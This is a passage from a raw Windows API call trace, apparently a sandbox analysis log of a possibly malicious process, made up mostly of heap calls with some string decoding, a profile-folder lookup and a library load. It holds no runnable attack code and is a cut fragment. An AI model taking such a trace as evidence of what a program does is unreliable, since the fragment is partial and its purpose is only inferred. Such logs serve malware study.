(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0265.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0265.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0265.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0265.018] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0265.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0265.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0265.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0265.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0265.019] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0265.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0265.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0265.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0265.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17d8 [0265.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0265.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0265.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0265.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0265.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0265.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0265.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0265.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0265.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.022] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0265.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0265.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.022] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0265.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.026] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Videos", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2784c, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0xaa5760 [0265.026] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0265.026] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.026] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.026] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.026] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0265.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.027] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.033] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.033] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.033] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.033] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.033] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.034] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.034] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.034] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0265.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.034] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0265.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0265.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.035] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.035] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.035] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0265.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0265.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.036] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0265.037] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0265.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0265.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.037] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.037] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.038] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 